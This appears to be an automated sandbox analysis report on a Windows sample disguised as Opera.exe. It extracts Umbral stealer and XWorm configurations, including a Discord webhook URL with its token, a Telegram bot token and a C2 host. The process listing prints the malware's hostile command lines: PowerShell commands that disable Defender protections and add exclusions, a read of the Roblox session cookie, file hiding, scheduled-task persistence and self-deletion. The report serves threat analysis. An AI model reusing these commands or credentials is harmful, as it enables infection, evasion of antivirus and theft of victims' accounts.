Analysis
max time kernel: 110s
max time network: 151s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 26-04-2024 13:15
General
Target: Opera.exe
Size: 319KB
MD5: f69924b642ac4b9ef1dfacdfd43759a9
SHA1: 95da50564c7cbc3749148419c68a08b0f2869ee1
SHA256: d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18
SHA512: 2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07
SSDEEP: 6144:48loZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmiW2brXv5P:7oZRL+EP8DDUgoOJBiLHaIJtMQIL/5P
Malware Config
Extracted: umbral
  https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2
Extracted: xworm
  phentermine-partial.gl.at.ply.gg:36969
  Install_directory: %AppData%
  install_file: Client.exe
  telegram: https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y
Signatures

Detect Umbral payload (3 IoCs)
  resource  yara_rule
  behavioral1/files/0x000900000001aaff-5.dat  family_umbral
  behavioral1/memory/4500-10-0x0000027C630E0000-0x0000027C63120000-memory.dmp  family_umbral
  behavioral1/memory/2660-11-0x0000000000400000-0x0000000000457000-memory.dmp  family_umbral

Detect Xworm Payload (3 IoCs)
  resource  yara_rule
  behavioral1/files/0x000800000001abe7-9.dat  family_xworm
  behavioral1/memory/2660-11-0x0000000000400000-0x0000000000457000-memory.dmp  family_xworm
  behavioral1/memory/4472-12-0x0000000000FC0000-0x0000000000FDA000-memory.dmp  family_xworm

Drops file in Drivers directory (1 IoC)
  description  ioc  Process
  File opened for modification  C:\Windows\System32\drivers\etc\hosts  Umbral3.exe

Drops startup file (2 IoCs)
  description  ioc  Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk  XClient.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Client.lnk  XClient.exe

Executes dropped EXE (4 IoCs)
  pid  Process
  4500  Umbral3.exe
  4472  XClient.exe
  4716  Client.exe
  3372  Client.exe

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow  ioc
  8  discord.com
  9  discord.com

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  4  ip-api.com

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid  Process
  2480  schtasks.exe

Detects videocard installed (1 TTP, 1 IoC)
  Uses WMIC.exe to determine videocard installed.
  pid  Process
  220  wmic.exe

Runs ping.exe (1 TTP, 1 IoC)
  pid  Process
  4460  PING.EXE

Suspicious behavior: EnumeratesProcesses (28 IoCs)
  pid  Process
  1420  powershell.exe
  1420  powershell.exe
  1420  powershell.exe
  2932  powershell.exe
  2932  powershell.exe
  2932  powershell.exe
  5028  powershell.exe
  5028  powershell.exe
  5028  powershell.exe
  5072  powershell.exe
  5072  powershell.exe
  5072  powershell.exe
  4204  powershell.exe
  4204  powershell.exe
  4204  powershell.exe
  436  powershell.exe
  436  powershell.exe
  436  powershell.exe
  1752  powershell.exe
  1752  powershell.exe
  1752  powershell.exe
  4224  powershell.exe
  4224  powershell.exe
  4224  powershell.exe
  4580  powershell.exe
  4580  powershell.exe
  4580  powershell.exe
  4472  XClient.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description  pid  Process
  Token: SeDebugPrivilege  4472  XClient.exe
  Token: SeDebugPrivilege  4500  Umbral3.exe
  Token: SeDebugPrivilege  1420  powershell.exe
  Token: SeIncreaseQuotaPrivilege  1420  powershell.exe
  Token: SeSecurityPrivilege  1420  powershell.exe
  Token: SeTakeOwnershipPrivilege  1420  powershell.exe
  Token: SeLoadDriverPrivilege  1420  powershell.exe
  Token: SeSystemProfilePrivilege  1420  powershell.exe
  Token: SeSystemtimePrivilege  1420  powershell.exe
  Token: SeProfSingleProcessPrivilege  1420  powershell.exe
  Token: SeIncBasePriorityPrivilege  1420  powershell.exe
  Token: SeCreatePagefilePrivilege  1420  powershell.exe
  Token: SeBackupPrivilege  1420  powershell.exe
  Token: SeRestorePrivilege  1420  powershell.exe
  Token: SeShutdownPrivilege  1420  powershell.exe
  Token: SeDebugPrivilege  1420  powershell.exe
  Token: SeSystemEnvironmentPrivilege  1420  powershell.exe
  Token: SeRemoteShutdownPrivilege  1420  powershell.exe
  Token: SeUndockPrivilege  1420  powershell.exe
  Token: SeManageVolumePrivilege  1420  powershell.exe
  Token: 33  1420  powershell.exe
  Token: 34  1420  powershell.exe
  Token: 35  1420  powershell.exe
  Token: 36  1420  powershell.exe
  Token: SeDebugPrivilege  2932  powershell.exe
  Token: SeDebugPrivilege  5028  powershell.exe
  Token: SeDebugPrivilege  5072  powershell.exe
  Token: SeDebugPrivilege  4204  powershell.exe
  Token: SeIncreaseQuotaPrivilege  4204  powershell.exe
  Token: SeSecurityPrivilege  4204  powershell.exe
  Token: SeTakeOwnershipPrivilege  4204  powershell.exe
  Token: SeLoadDriverPrivilege  4204  powershell.exe
  Token: SeSystemProfilePrivilege  4204  powershell.exe
  Token: SeSystemtimePrivilege  4204  powershell.exe
  Token: SeProfSingleProcessPrivilege  4204  powershell.exe
  Token: SeIncBasePriorityPrivilege  4204  powershell.exe
  Token: SeCreatePagefilePrivilege  4204  powershell.exe
  Token: SeBackupPrivilege  4204  powershell.exe
  Token: SeRestorePrivilege  4204  powershell.exe
  Token: SeShutdownPrivilege  4204  powershell.exe
  Token: SeDebugPrivilege  4204  powershell.exe
  Token: SeSystemEnvironmentPrivilege  4204  powershell.exe
  Token: SeRemoteShutdownPrivilege  4204  powershell.exe
  Token: SeUndockPrivilege  4204  powershell.exe
  Token: SeManageVolumePrivilege  4204  powershell.exe
  Token: 33  4204  powershell.exe
  Token: 34  4204  powershell.exe
  Token: 35  4204  powershell.exe
  Token: 36  4204  powershell.exe
  Token: SeIncreaseQuotaPrivilege  668  wmic.exe
  Token: SeSecurityPrivilege  668  wmic.exe
  Token: SeTakeOwnershipPrivilege  668  wmic.exe
  Token: SeLoadDriverPrivilege  668  wmic.exe
  Token: SeSystemProfilePrivilege  668  wmic.exe
  Token: SeSystemtimePrivilege  668  wmic.exe
  Token: SeProfSingleProcessPrivilege  668  wmic.exe
  Token: SeIncBasePriorityPrivilege  668  wmic.exe
  Token: SeCreatePagefilePrivilege  668  wmic.exe
  Token: SeBackupPrivilege  668  wmic.exe
  Token: SeRestorePrivilege  668  wmic.exe
  Token: SeShutdownPrivilege  668  wmic.exe
  Token: SeDebugPrivilege  668  wmic.exe
  Token: SeSystemEnvironmentPrivilege  668  wmic.exe
  Token: SeRemoteShutdownPrivilege  668  wmic.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid  Process
  4472  XClient.exe

Suspicious use of WriteProcessMemory (38 IoCs)
  description  pid  Process  procid_target
  PID 2660 wrote to memory of 4500  2660  Opera.exe  73
  PID 2660 wrote to memory of 4500  2660  Opera.exe  73
  PID 2660 wrote to memory of 4472  2660  Opera.exe  74
  PID 2660 wrote to memory of 4472  2660  Opera.exe  74
  PID 4500 wrote to memory of 4476  4500  Umbral3.exe  75
  PID 4500 wrote to memory of 4476  4500  Umbral3.exe  75
  PID 4500 wrote to memory of 1420  4500  Umbral3.exe  77
  PID 4500 wrote to memory of 1420  4500  Umbral3.exe  77
  PID 4500 wrote to memory of 2932  4500  Umbral3.exe  80
  PID 4500 wrote to memory of 2932  4500  Umbral3.exe  80
  PID 4500 wrote to memory of 5028  4500  Umbral3.exe  83
  PID 4500 wrote to memory of 5028  4500  Umbral3.exe  83
  PID 4500 wrote to memory of 5072  4500  Umbral3.exe  85
  PID 4500 wrote to memory of 5072  4500  Umbral3.exe  85
  PID 4472 wrote to memory of 4204  4472  XClient.exe  87
  PID 4472 wrote to memory of 4204  4472  XClient.exe  87
  PID 4500 wrote to memory of 668  4500  Umbral3.exe  89
  PID 4500 wrote to memory of 668  4500  Umbral3.exe  89
  PID 4472 wrote to memory of 436  4472  XClient.exe  91
  PID 4472 wrote to memory of 436  4472  XClient.exe  91
  PID 4500 wrote to memory of 2220  4500  Umbral3.exe  93
  PID 4500 wrote to memory of 2220  4500  Umbral3.exe  93
  PID 4500 wrote to memory of 2992  4500  Umbral3.exe  95
  PID 4500 wrote to memory of 2992  4500  Umbral3.exe  95
  PID 4500 wrote to memory of 1752  4500  Umbral3.exe  97
  PID 4500 wrote to memory of 1752  4500  Umbral3.exe  97
  PID 4472 wrote to memory of 4224  4472  XClient.exe  99
  PID 4472 wrote to memory of 4224  4472  XClient.exe  99
  PID 4500 wrote to memory of 220  4500  Umbral3.exe  101
  PID 4500 wrote to memory of 220  4500  Umbral3.exe  101
  PID 4472 wrote to memory of 4580  4472  XClient.exe  103
  PID 4472 wrote to memory of 4580  4472  XClient.exe  103
  PID 4500 wrote to memory of 2880  4500  Umbral3.exe  105
  PID 4500 wrote to memory of 2880  4500  Umbral3.exe  105
  PID 2880 wrote to memory of 4460  2880  cmd.exe  107
  PID 2880 wrote to memory of 4460  2880  cmd.exe  107
  PID 4472 wrote to memory of 2480  4472  XClient.exe  108
  PID 4472 wrote to memory of 2480  4472  XClient.exe  108

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTP, 1 IoC)
  pid  Process
  4476  attrib.exe
Processes

C:\Users\Admin\AppData\Local\Temp\Opera.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Opera.exe"
  - Suspicious use of WriteProcessMemory
  PID: 2660

    C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4500

        C:\Windows\SYSTEM32\attrib.exe
          Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
          - Views/modifies file attributes
          PID: 4476

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1420

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2932

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5028

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5072

        C:\Windows\System32\Wbem\wmic.exe
          Command line: "wmic.exe" os get Caption
          - Suspicious use of AdjustPrivilegeToken
          PID: 668

        C:\Windows\System32\Wbem\wmic.exe
          Command line: "wmic.exe" computersystem get totalphysicalmemory
          PID: 2220

        C:\Windows\System32\Wbem\wmic.exe
          Command line: "wmic.exe" csproduct get uuid
          PID: 2992

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          - Suspicious behavior: EnumeratesProcesses
          PID: 1752

        C:\Windows\System32\Wbem\wmic.exe
          Command line: "wmic" path win32_VideoController get name
          - Detects videocard installed
          PID: 220

        C:\Windows\SYSTEM32\cmd.exe
          Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
          - Suspicious use of WriteProcessMemory
          PID: 2880

            C:\Windows\system32\PING.EXE
              Command line: ping localhost
              - Runs ping.exe
              PID: 4460

    C:\Users\Admin\AppData\Local\Temp\XClient.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
      - Drops startup file
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID: 4472

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 4204

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          - Suspicious behavior: EnumeratesProcesses
          PID: 436

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
          - Suspicious behavior: EnumeratesProcesses
          PID: 4224

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
          - Suspicious behavior: EnumeratesProcesses
          PID: 4580

        C:\Windows\System32\schtasks.exe
          Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
          - Creates scheduled task(s)
          PID: 2480

C:\Users\Admin\AppData\Roaming\Client.exe
  Command line: C:\Users\Admin\AppData\Roaming\Client.exe
  - Executes dropped EXE
  PID: 4716

C:\Users\Admin\AppData\Roaming\Client.exe
  Command line: C:\Users\Admin\AppData\Roaming\Client.exe
  - Executes dropped EXE
  PID: 3372
Network
MITRE ATT&CK Enterprise v15
Downloads